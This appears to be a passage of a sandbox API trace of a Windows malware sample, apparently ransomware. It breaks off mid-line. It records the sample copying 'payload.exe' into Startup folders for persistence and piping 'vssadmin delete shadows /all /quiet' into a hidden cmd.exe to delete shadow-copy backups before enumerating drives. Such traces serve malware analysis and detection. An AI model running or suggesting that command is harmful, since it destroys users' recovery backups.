GetProcAddress (hModule=0x76890000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x768bd650 [0260.850] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd9c | out: OldValue=0x18fd9c*=0x1) returned 1 [0260.851] lstrlenW (lpString="kernel32.dll") returned 12 [0260.851] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x559b70 | out: hHeap=0x520000) returned 1 [0260.851] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0260.851] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x559bc0 | out: hHeap=0x520000) returned 1 [0260.851] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2080020 | out: hHeap=0x520000) returned 1 [0260.851] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xfffe) returned 0x57eec8 [0260.851] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xfffe) returned 0x58eed0 [0260.851] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x554d78 [0260.851] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x554d78, Size=0x20) returned 0x559bc0 [0260.851] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x559bc0, Size=0x40) returned 0x55ac88 [0260.851] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x55ac88, Size=0x80) returned 0x59eef0 [0260.851] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x59eef0, Size=0x100) returned 0x55be10 [0260.851] lstrlenW (lpString="") returned 0 [0260.851] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0260.851] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8c) returned 0x55bf18 [0260.851] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x18fd18 | out: phkResult=0x18fd18*=0xe4) returned 0x0 [0260.851] RegQueryValueExW (in: hKey=0xe4, lpValueName="Common Startup", lpReserved=0x0, lpType=0x18fd24, lpData=0x58eed0, lpcbData=0x18fd50*=0x7fff | out: lpType=0x18fd24*=0x2, lpData="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0x18fd50*=0x78) returned 0x0 [0260.851] RegCloseKey (hKey=0xe4) returned 0x0 [0260.851] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x55bf18 | out: hHeap=0x520000) returned 1 [0260.851] lstrlenW (lpString="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 59 [0260.851] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0260.851] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x55be10 | out: hHeap=0x520000) returned 1 [0260.851] ExpandEnvironmentStringsW (in: lpSrc="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.exe", lpDst=0x57eec8, nSize=0x7fff | out: lpDst="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.exe") returned 0x49 [0260.851] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x58eed0 | out: hHeap=0x520000) returned 1 [0260.851] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x57eec8 | out: hHeap=0x520000) returned 1 [0260.851] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x100000) returned 0x2080020 [0260.852] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x554d78 [0260.852] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x554d78, Size=0x20) returned 0x559bc0 [0260.852] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x554d78 [0260.852] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x554d78, Size=0x20) returned 0x559b70 [0260.852] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76890000 [0260.852] GetProcAddress (hModule=0x76890000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x768bd650 [0260.852] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd9c | out: OldValue=0x18fd9c*=0x1) returned 1 [0260.852] lstrlenW (lpString="kernel32.dll") returned 12 [0260.852] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x559bc0 | out: hHeap=0x520000) returned 1 [0260.852] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0260.852] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x559b70 | out: hHeap=0x520000) returned 1 [0260.852] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\payload.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe4 [0260.852] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\payload.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0260.852] CloseHandle (hObject=0xe4) returned 1 [0260.852] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x554d78 [0260.852] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x554d78, Size=0x20) returned 0x559b70 [0260.852] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x554d78 [0260.852] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x554d78, Size=0x20) returned 0x559bc0 [0260.853] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76890000 [0260.853] GetProcAddress (hModule=0x76890000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x768bd650 [0260.853] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd9c | out: OldValue=0x18fd9c*=0x1) returned 1 [0260.853] lstrlenW (lpString="kernel32.dll") returned 12 [0260.853] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x559bc0 | out: hHeap=0x520000) returned 1 [0260.853] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0260.853] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x559b70 | out: hHeap=0x520000) returned 1 [0260.853] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2080020 | out: hHeap=0x520000) returned 1 [0260.853] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x55eeb8 | out: hHeap=0x520000) returned 1 [0260.853] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x56eec0 | out: hHeap=0x520000) returned 1 [0260.853] lstrlenW (lpString="%windir%\\System32") returned 17 [0260.853] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x55abf8 | out: hHeap=0x520000) returned 1 [0260.853] lstrlenW (lpString="%appdata%") returned 9 [0260.853] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x534640 | out: hHeap=0x520000) returned 1 [0260.853] lstrlenW (lpString="%sh(Startup)%") returned 13 [0260.853] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x534618 | out: hHeap=0x520000) returned 1 [0260.853] lstrlenW (lpString="%sh(Common Startup)%") returned 20 [0260.853] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x55ac40 | out: hHeap=0x520000) returned 1 [0260.853] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x554d78 [0260.853] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x554d78, Size=0x20) returned 0x534618 [0260.853] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x534618, Size=0x40) returned 0x55ac40 [0260.853] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x55ac40, Size=0x80) returned 0x59eef0 [0260.853] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x554d78 [0260.853] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x554d78, Size=0x20) returned 0x534618 [0260.853] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1fffc) returned 0x55eeb8 [0260.853] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xfffe) returned 0x57eec0 [0260.853] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xfffe) returned 0x58eec8 [0260.853] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x554d78 [0260.853] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x554d78, Size=0x20) returned 0x534640 [0260.853] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x534640, Size=0x40) returned 0x55ac40 [0260.853] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x55ac40, Size=0x80) returned 0x59ef78 [0260.902] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x59ef78, Size=0x100) returned 0x55be10 [0260.902] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0260.902] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x55be10 | out: hHeap=0x520000) returned 1 [0260.902] ExpandEnvironmentStringsW (in: lpSrc="%comspec%", lpDst=0x57eec0, nSize=0x7fff | out: lpDst="C:\\Windows\\system32\\cmd.exe") returned 0x1c [0260.902] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x58eec8 | out: hHeap=0x520000) returned 1 [0260.902] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x57eec0 | out: hHeap=0x520000) returned 1 [0260.926] CreatePipe (in: hReadPipe=0x18fd58, hWritePipe=0x18fd5c, lpPipeAttributes=0x18fd48, nSize=0x0 | out: hReadPipe=0x18fd58*=0xe8, hWritePipe=0x18fd5c*=0xec) returned 1 [0260.935] CreatePipe (in: hReadPipe=0x18fdc8, hWritePipe=0x18fdcc, lpPipeAttributes=0x18fd48, nSize=0x0 | out: hReadPipe=0x18fdc8*=0xf0, hWritePipe=0x18fdcc*=0xf4) returned 1 [0260.935] SetHandleInformation (hObject=0xec, dwMask=0x1, dwFlags=0x0) returned 1 [0260.935] SetHandleInformation (hObject=0xf0, dwMask=0x1, dwFlags=0x0) returned 1 [0260.936] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18fd68*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xe8, hStdOutput=0xf4, hStdError=0xf4), lpProcessInformation=0x18fdb8 | out: lpCommandLine=0x0, lpProcessInformation=0x18fdb8*(hProcess=0xfc, hThread=0xf8, dwProcessId=0x608, dwThreadId=0x60c)) returned 1 [0261.635] lstrlenA (lpString="mode con cp select=1251\nvssadmin delete shadows /all /quiet\nExit\n") returned 65 [0261.635] WriteFile (in: hFile=0xec, lpBuffer=0x59eef0*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x18fd64, lpOverlapped=0x0 | out: lpBuffer=0x59eef0*, lpNumberOfBytesWritten=0x18fd64*=0x41, lpOverlapped=0x0) returned 1 [0261.635] CloseHandle (hObject=0xfc) returned 1 [0261.635] CloseHandle (hObject=0xf8) returned 1 [0261.635] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x55eeb8 | out: hHeap=0x520000) returned 1 [0261.635] lstrlenA (lpString="mode con cp select=1251\nvssadmin delete shadows /all /quiet\nExit\n") returned 65 [0261.635] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x59eef0 | out: hHeap=0x520000) returned 1 [0261.635] lstrlenW (lpString="%comspec%") returned 9 [0261.635] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x534618 | out: hHeap=0x520000) returned 1 [0261.636] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x40a530, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xf8 [0261.636] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x554d78 [0261.636] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x40a710, lpParameter=0x554d78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xfc [0261.637] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5594b8 [0261.637] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4098e0, lpParameter=0x5594b8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x104 [0261.637] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x554d90 [0261.637] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x554d90, Size=0x20) returned 0x534618 [0261.637] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x534618, Size=0x40) returned 0x55ac40 [0261.637] lstrlenW (lpString="ABCDEFGHIJKLMNOPQRSTUVWXYZ") returned 26 [0261.637] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xd0) returned 0x55be10 [0261.637] GetLogicalDrives () returned 0x4 [0261.637] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10014) returned 0x55eeb8 [0261.637] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x554d90 [0261.637] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x554d90, Size=0x20) returned 0x534618 [0261.637] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x534618, Size=0x40) returned 0x55acd0 [0261.637] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x55acd0, Size=0x80) returned 0x59eef0 [0261.637] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x59eef0, Size=0x100) returned 0x55d408 [0261.637] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x55d408, Size=0x200) returned 0x55d408 [0261.637] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x55d408, Size=0x400) returned 0x55d408 [0261.638] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x55d408, Size=0x800) returned 0x5a0ed8 [0261.638] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5a0ed8, Size=0x1000) returned 0x5a0ed8 [0261.638] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10000) returned 0x56eed8 [0261.638] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x554d90 [0261.638] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x554e68 [0261.638] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x4) returned 0x5594c8 [0261.638] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x554e80 [0261.638] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x4) returned 0x559480 [0261.638] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x554e98 [0261.638] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x559480, Size=0x8) returned 0x559480 [0261.638] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x554eb0 [0261.638] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x559480, Size=0x10) returned 0x559480 [0261.638] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x554ec8 [0261.638] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x554ee0 [0261.638] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x559480, Size=0x20) returned 0x559578 [0261.638] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x554ef8 [0261.638] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x559480 [0261.638] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xe) returned 0x554f10 [0261.638] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xe) returned 0x554f28 [0261.638] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x559578, Size=0x40) returned 0x559578 [0261.638] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xe) returned 0x554f40 [0261.638] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xe) returned 0x554f58 [0261.638] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xe) returned 0x554f70 [0261.638] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xe) returned 0x554f88 [0261.638] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x554fa0 [0261.638] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x554fb8 [0261.638] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x559490 [0261.638] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x554fd0 [0261.638] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x559578, Size=0x80) returned 0x55bee8 [0261.638] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x554fe8 [0261.638] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x555000 [0261.638] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x555018 [0261.638] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x55d420 [0261.638] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x55d438 [0261.638] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x55d450 [0261.639] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x55d468 [0261.639] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x55d808 [0261.639] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x55d480 [0261.639] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x55d498 [0261.639] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x55d4b0 [0261.639] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x55d4c8 [0261.639] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x55d4e0 [0261.639] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x55d4f8 [0261.639] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x55d510 [0261.639] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x55d528 [0261.639] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x55bee8, Size=0x100) returned 0x55da20 [0261.639] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x55d540 [0261.639] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x55d558 [0261.639] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x55d570 [0261.639] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x55d588 [0261.639] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x55d5a0 [0261.639] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x55d5b8 [0261.639] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5a1ef8 [0261.639] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x55d5d0 [0261.639] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x55d5e8 [0261.639] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x55d600 [0261.639] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x6) returned 0x5a1f08 [0261.639] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x55d618 [0261.639] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x55d630 [0261.639] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5a1f18 [0261.639] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x55d648 [0261.639] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x55d660 [0261.639] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x55d678 [0261.639] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x55d690 [0261.639] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x55d6a8 [0261.639] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x55d6c0 [0261.639] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xe) returned 0x55d6d8 [0261.639] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x55d6f0 [0261.639] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x55d708 [0261.639] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x55d720 [0261.639] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x55d738 [0261.639] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x55d750 [0261.640] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x55d768 [0261.640] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5a1f28 [0261.640] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x55d780 [0261.640] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x55d798 [0261.640] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x55d7b0 [0261.640] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x55d7c8 [0261.640] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x55da20, Size=0x200) returned 0x55da20 [0261.640] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x55d7e0 [0261.640] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5a1f38 [0261.640] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a22f8 [0261.640] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2310 [0261.640] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2328 [0261.640] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2340 [0261.640] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2358 [0261.640] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2370 [0261.640] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2388 [0261.640] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a23a0 [0261.640] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a23b8 [0261.640] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x5a23d0 [0261.640] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x5a23e8 [0261.640] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2400 [0261.640] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2418 [0261.640] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x5a2430 [0261.640] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x5a2448 [0261.640] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2460 [0261.640] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x5a2478 [0261.640] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x5a2490 [0261.640] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a24a8 [0261.640] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a24c0 [0261.640] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a24d8 [0261.640] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5a1f48 [0261.640] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a24f0 [0261.640] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2508 [0261.640] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2520 [0261.640] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5a1f58 [0261.640] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2538 [0261.640] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x5a2550 [0261.641] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2568 [0261.641] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2580 [0261.641] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2598 [0261.641] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a25b0 [0261.641] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a25c8 [0261.641] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a25e0 [0261.641] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x5a25f8 [0261.641] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x5a2610 [0261.641] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2628 [0261.641] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2640 [0261.641] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2658 [0261.641] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x5a2670 [0261.641] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2688 [0261.641] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a26a0 [0261.641] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a26b8 [0261.641] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a26f8 [0261.641] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2710 [0261.641] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2728 [0261.641] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2740 [0261.641] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5a1f68 [0261.641] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x6) returned 0x5a1f78 [0261.641] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2758 [0261.641] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a2770 [0261.641] RtlAllocateHeap 